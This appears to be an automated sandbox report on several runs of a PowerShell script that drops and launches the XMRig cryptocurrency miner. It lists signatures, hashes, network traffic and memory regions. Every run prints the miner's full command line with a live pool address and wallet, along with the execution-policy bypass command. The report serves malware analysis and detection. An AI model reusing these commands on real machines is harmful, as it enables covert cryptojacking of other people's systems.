memory/1424-67-0x00007FF7D0AC0000-0x00007FF7D16F3000-memory.dmp

memory/1424-68-0x00007FF7D0AC0000-0x00007FF7D16F3000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win11-20240508-en

Max time kernel

146s

Max time network

155s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 52.111.229.19:443 tcp

Files

memory/4360-0-0x00007FFD03473000-0x00007FFD03475000-memory.dmp

memory/4360-9-0x000001B841950000-0x000001B841972000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pgxrwn12.ydg.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4360-10-0x00007FFD03470000-0x00007FFD03F32000-memory.dmp

memory/4360-11-0x00007FFD03470000-0x00007FFD03F32000-memory.dmp

memory/4360-12-0x00007FFD03470000-0x00007FFD03F32000-memory.dmp

memory/4360-14-0x000001B841CF0000-0x000001B841D02000-memory.dmp

memory/4360-15-0x000001B829470000-0x000001B82947A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3632-46-0x0000021E96D70000-0x0000021E96D90000-memory.dmp

memory/3632-47-0x0000021E96DB0000-0x0000021E96DD0000-memory.dmp

memory/3632-48-0x00007FF7907F0000-0x00007FF791423000-memory.dmp

memory/4360-49-0x00007FFD03470000-0x00007FFD03F32000-memory.dmp

memory/4360-51-0x00007FFD03473000-0x00007FFD03475000-memory.dmp

memory/3632-50-0x00007FF7907F0000-0x00007FF791423000-memory.dmp

memory/4360-52-0x00007FFD03470000-0x00007FFD03F32000-memory.dmp

memory/3632-54-0x0000021E96DD0000-0x0000021E96DF0000-memory.dmp

memory/3632-53-0x0000021F29990000-0x0000021F299B0000-memory.dmp

memory/3632-55-0x00007FF7907F0000-0x00007FF791423000-memory.dmp

memory/3632-56-0x00007FF7907F0000-0x00007FF791423000-memory.dmp

memory/3632-57-0x0000021F29990000-0x0000021F299B0000-memory.dmp

memory/3632-58-0x0000021E96DD0000-0x0000021E96DF0000-memory.dmp

memory/3632-59-0x00007FF7907F0000-0x00007FF791423000-memory.dmp

memory/3632-60-0x00007FF7907F0000-0x00007FF791423000-memory.dmp

memory/3632-61-0x00007FF7907F0000-0x00007FF791423000-memory.dmp

memory/3632-62-0x00007FF7907F0000-0x00007FF791423000-memory.dmp

memory/3632-63-0x00007FF7907F0000-0x00007FF791423000-memory.dmp

memory/3632-64-0x00007FF7907F0000-0x00007FF791423000-memory.dmp

memory/3632-65-0x00007FF7907F0000-0x00007FF791423000-memory.dmp

memory/3632-66-0x00007FF7907F0000-0x00007FF791423000-memory.dmp

memory/3632-67-0x00007FF7907F0000-0x00007FF791423000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win10-20240404-en

Max time kernel

142s

Max time network

144s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 2.173.189.20.in-addr.arpa udp

Files

memory/1900-2-0x00007FFC76193000-0x00007FFC76194000-memory.dmp

memory/1900-5-0x0000022E7C6F0000-0x0000022E7C712000-memory.dmp

memory/1900-9-0x00007FFC76190000-0x00007FFC76B7C000-memory.dmp

memory/1900-18-0x00007FFC76190000-0x00007FFC76B7C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dykta5p2.fkx.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1900-8-0x0000022E7CD70000-0x0000022E7CDE6000-memory.dmp

memory/1900-25-0x00007FFC76190000-0x00007FFC76B7C000-memory.dmp

memory/1900-48-0x0000022E7CEF0000-0x0000022E7CF02000-memory.dmp

memory/1900-61-0x0000022E7CD60000-0x0000022E7CD6A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4384-90-0x000001D40D2B0000-0x000001D40D2D0000-memory.dmp

memory/4384-91-0x00007FF7D7690000-0x00007FF7D82C3000-memory.dmp

memory/1900-93-0x00007FFC76193000-0x00007FFC76194000-memory.dmp

memory/4384-92-0x00007FF7D7690000-0x00007FF7D82C3000-memory.dmp

memory/1900-94-0x00007FFC76190000-0x00007FFC76B7C000-memory.dmp

memory/1900-95-0x00007FFC76190000-0x00007FFC76B7C000-memory.dmp

memory/4384-96-0x00007FF7D7690000-0x00007FF7D82C3000-memory.dmp

memory/4384-97-0x00007FF7D7690000-0x00007FF7D82C3000-memory.dmp

memory/4384-98-0x00007FF7D7690000-0x00007FF7D82C3000-memory.dmp

memory/4384-99-0x00007FF7D7690000-0x00007FF7D82C3000-memory.dmp

memory/4384-100-0x00007FF7D7690000-0x00007FF7D82C3000-memory.dmp

memory/4384-101-0x00007FF7D7690000-0x00007FF7D82C3000-memory.dmp

memory/4384-102-0x00007FF7D7690000-0x00007FF7D82C3000-memory.dmp

memory/4384-103-0x00007FF7D7690000-0x00007FF7D82C3000-memory.dmp

memory/4384-104-0x00007FF7D7690000-0x00007FF7D82C3000-memory.dmp

memory/4384-105-0x00007FF7D7690000-0x00007FF7D82C3000-memory.dmp

memory/4384-106-0x00007FF7D7690000-0x00007FF7D82C3000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win10v2004-20240426-en

Max time kernel

149s

Max time network

145s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp

Files

memory/3200-0-0x00007FFC279D3000-0x00007FFC279D5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ofpisoaz.o2b.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3200-10-0x00000246F9730000-0x00000246F9752000-memory.dmp

memory/3200-11-0x00007FFC279D0000-0x00007FFC28491000-memory.dmp

memory/3200-12-0x00007FFC279D0000-0x00007FFC28491000-memory.dmp

memory/3200-16-0x00000246F9E60000-0x00000246F9E6A000-memory.dmp

memory/3200-15-0x00000246F9E80000-0x00000246F9E92000-memory.dmp

memory/3200-14-0x00007FFC279D0000-0x00007FFC28491000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 efe5989c2f6f24a6d513f0c485d3c10c
SHA1 78c9b963243a5c24c2f09a84c6a8b883116e8d93
SHA256 ef3d0a2db6334e1d3169f634f7da915ece007412ec16abb1867a321aae063680
SHA512 d2669991e704590c339ccbfe06b1a67d96f3836019d29361095a3d3361106686f65efe98aa2245015fccc748b946b589576c78afa9d38fcab0f636bbfd31e392

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 177315780a5666331df5331dd2fcc6af
SHA1 30a8d1f9da56672fe3d9d9244d527639b0c533c5
SHA256 c2df3af3b509745774cbc74f3b49263bcdde67b3e0fb97494167710d93b75f74
SHA512 3da3ad7542fc6ba1abd66b96acc02b913bba50c6392b78c195e933917ab8815e8721ef5c95884459be7a3c9ba48529c087e31974d5318e9651ba236c633d073d

memory/3308-47-0x000001D9FAD30000-0x000001D9FAD50000-memory.dmp

memory/3308-48-0x000001DA8EDB0000-0x000001DA8EDD0000-memory.dmp

memory/3308-49-0x00007FF7A4BC0000-0x00007FF7A57F3000-memory.dmp

memory/3308-52-0x000001DA8F400000-0x000001DA8F420000-memory.dmp

memory/3308-50-0x00007FF7A4BC0000-0x00007FF7A57F3000-memory.dmp

memory/3308-51-0x000001DA8F420000-0x000001DA8F440000-memory.dmp

memory/3200-53-0x00007FFC279D3000-0x00007FFC279D5000-memory.dmp

memory/3200-54-0x00007FFC279D0000-0x00007FFC28491000-memory.dmp

memory/3308-55-0x00007FF7A4BC0000-0x00007FF7A57F3000-memory.dmp

memory/3200-56-0x00007FFC279D0000-0x00007FFC28491000-memory.dmp

memory/3308-57-0x00007FF7A4BC0000-0x00007FF7A57F3000-memory.dmp

memory/3308-58-0x000001DA8F420000-0x000001DA8F440000-memory.dmp

memory/3308-59-0x000001DA8F400000-0x000001DA8F420000-memory.dmp

memory/3308-60-0x00007FF7A4BC0000-0x00007FF7A57F3000-memory.dmp

memory/3308-61-0x00007FF7A4BC0000-0x00007FF7A57F3000-memory.dmp

memory/3308-62-0x00007FF7A4BC0000-0x00007FF7A57F3000-memory.dmp

memory/3308-63-0x00007FF7A4BC0000-0x00007FF7A57F3000-memory.dmp

memory/3308-64-0x00007FF7A4BC0000-0x00007FF7A57F3000-memory.dmp

memory/3308-65-0x00007FF7A4BC0000-0x00007FF7A57F3000-memory.dmp

memory/3308-66-0x00007FF7A4BC0000-0x00007FF7A57F3000-memory.dmp

memory/3308-67-0x00007FF7A4BC0000-0x00007FF7A57F3000-memory.dmp

memory/3308-68-0x00007FF7A4BC0000-0x00007FF7A57F3000-memory.dmp

memory/3308-69-0x00007FF7A4BC0000-0x00007FF7A57F3000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win10-20240404-en

Max time kernel

143s

Max time network

136s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 89.65.42.20.in-addr.arpa udp

Files

memory/2768-3-0x00007FFD0B763000-0x00007FFD0B764000-memory.dmp

memory/2768-5-0x0000013A8DFF0000-0x0000013A8E012000-memory.dmp

memory/2768-6-0x00007FFD0B760000-0x00007FFD0C14C000-memory.dmp

memory/2768-9-0x0000013AA6690000-0x0000013AA6706000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_acohpes3.or4.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2768-10-0x00007FFD0B760000-0x00007FFD0C14C000-memory.dmp

memory/2768-25-0x00007FFD0B760000-0x00007FFD0C14C000-memory.dmp

memory/2768-48-0x0000013A8E020000-0x0000013A8E032000-memory.dmp

memory/2768-61-0x0000013A8DEC0000-0x0000013A8DECA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3536-90-0x0000029C31080000-0x0000029C310A0000-memory.dmp

memory/2768-91-0x00007FFD0B763000-0x00007FFD0B764000-memory.dmp

memory/3536-92-0x00007FF776EB0000-0x00007FF777AE3000-memory.dmp

memory/2768-93-0x00007FFD0B760000-0x00007FFD0C14C000-memory.dmp

memory/3536-94-0x00007FF776EB0000-0x00007FF777AE3000-memory.dmp

memory/2768-95-0x00007FFD0B760000-0x00007FFD0C14C000-memory.dmp

memory/3536-96-0x00007FF776EB0000-0x00007FF777AE3000-memory.dmp

memory/3536-97-0x00007FF776EB0000-0x00007FF777AE3000-memory.dmp

memory/3536-98-0x00007FF776EB0000-0x00007FF777AE3000-memory.dmp

memory/3536-99-0x00007FF776EB0000-0x00007FF777AE3000-memory.dmp

memory/3536-100-0x00007FF776EB0000-0x00007FF777AE3000-memory.dmp

memory/3536-101-0x00007FF776EB0000-0x00007FF777AE3000-memory.dmp

memory/3536-102-0x00007FF776EB0000-0x00007FF777AE3000-memory.dmp

memory/3536-103-0x00007FF776EB0000-0x00007FF777AE3000-memory.dmp

memory/3536-104-0x00007FF776EB0000-0x00007FF777AE3000-memory.dmp

memory/3536-105-0x00007FF776EB0000-0x00007FF777AE3000-memory.dmp

memory/3536-106-0x00007FF776EB0000-0x00007FF777AE3000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win10v2004-20240508-en

Max time kernel

141s

Max time network

144s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp

Files

memory/3896-0-0x00007FFA19893000-0x00007FFA19895000-memory.dmp

memory/3896-6-0x0000023E71760000-0x0000023E71782000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tpabplma.gml.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
